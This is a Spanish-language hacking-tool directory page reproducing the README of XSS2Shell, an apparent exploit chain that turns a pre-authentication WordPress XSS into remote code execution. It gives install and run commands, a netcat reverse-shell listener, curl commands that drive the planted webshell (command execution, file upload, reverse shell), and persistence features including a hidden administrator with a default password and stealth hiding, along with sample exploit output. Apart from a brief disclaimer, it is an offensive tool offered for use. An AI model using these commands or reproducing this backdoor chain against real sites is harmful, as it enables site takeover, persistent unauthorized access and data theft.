Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
XSS2Shell — Explota la XSS previa a la autenticación de WordPress (CVE-2026-64638) para lograr la ejecución remota de código, instalando un webshell de puerta trasera cifrado con AES con persistencia, subida de archivos, shell inversa y opciones de sigilo para ejercicios de red team autorizados. | Kitploit
Herramientas/GitHubGitHub/g0d150ne/xss2shell
Mecanismos de PersistenciaExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónComando y ControlRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubg0d150ne/xss2shell

XSS2Shell

Ver Repositorio
hace 10 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Explota la XSS previa a la autenticación de WordPress (CVE-2026-64638) para lograr la ejecución remota de código, instalando un webshell de puerta trasera cifrado con AES con persistencia, subida de archivos, shell inversa y opciones de sigilo para ejercicios de red team autorizados.

Compartir

XSS2Shell ULTIMATE v3.0

Cadena de explotación XSS sin autenticación previa → RCE en WordPress
Desarrollado por G0D150NE

📌 Características

  • 🔍 Detección automática de XSS y versión de WordPress
  • 🎯 3 modos: Auto, XSS, Direct
  • 📡 Servidor de callback para capturar credenciales
  • 🐚 WebShell con múltiples métodos de ejecución
  • 🔄 Persistencia (tarea cron, administrador oculto, auto-replicación)
  • 📁 Subida/descarga de archivos
  • 🖥️ Reverse shell con un clic
  • 🛡️ Modo sigiloso (ocultarse de la lista de plugins)
  • 🔐 Puerta trasera cifrada con AES-256

📦 Instalación

root@kitploit:~
# Clonar
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Instalar dependencias
pip3 install requests beautifulsoup4 cryptography

# Ejecutar
python3 poc.py -h

🚀 Inicio rápido

1. Configurar el listener

root@kitploit:~
# Abrir terminal para reverse shell
nc -lvnp 4444

2. Ejecutar el exploit

Modo automático (recomendado)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

Modo XSS (sin credenciales)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

Modo directo (con credenciales)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 Ejecución de comandos

Una vez instalada la webshell:

root@kitploit:~
# Codificado en Base64 (recomendado)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Comando directo
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Subir archivo
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 Ejemplos de uso

root@kitploit:~
# 1. Escaneo automático + explotación
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. Cadena XSS sin credenciales
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Puerto y nombre de plugin personalizados
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Cambiar la contraseña de la puerta trasera
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Puerto de callback personalizado
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 Opciones de comandos

🐚 Características de la WebShell

Después de una explotación exitosa:

Administrador oculto creado:

  • Nombre de usuario: sysadmin_{slug}
  • Contraseña: {backdoor-pass} (por defecto: G0D150NE)

📸 Salida de ejemplo

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 Solución de problemas

⚠️ Aviso legal

Solo para fines educativos y pruebas autorizadas.
Úsalo únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba.
El autor no se hace responsable del mal uso o de cualquier daño causado.

📞 Contacto

  • Autor: G0D150NE
  • CVE: CVE-2026-64638
root@kitploit:~
Descargar herramienta
OpciónDescripciónPor defecto
targetURL de WordPress objetivoRequerido
-u, --usernameUsuario administrador de WordPress-
-p, --wp-passContraseña del administrador de WordPress-
--lhostDirección IP del listener127.0.0.1
--lportPuerto del listener4444
--modeModo de explotación (auto/xss/direct)auto
--slugNombre del slug del pluging0d150ne
--callback-portPuerto del servidor de callback9090
--backdoor-passContraseña de la puerta traseraG0D150NE
CaracterísticaComando
Ejecutar comando?b2h=BASE64_CMD
Subir archivo-F '[email protected]'
Reverse shell?rev=1
Comando directo?cmd=id
Puerta trasera cifrada?decrypt=AES_DATA
ProblemaSolución
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Conexión rechazadaComprueba el listener: nc -lvnp 4444
Error de inicio de sesiónVerifica las credenciales o usa el modo XSS
Error al subir el pluginComprueba los permisos, usa un slug diferente
Conflicto de argumentosUsa -p para wp-pass y --backdoor-pass para la puerta trasera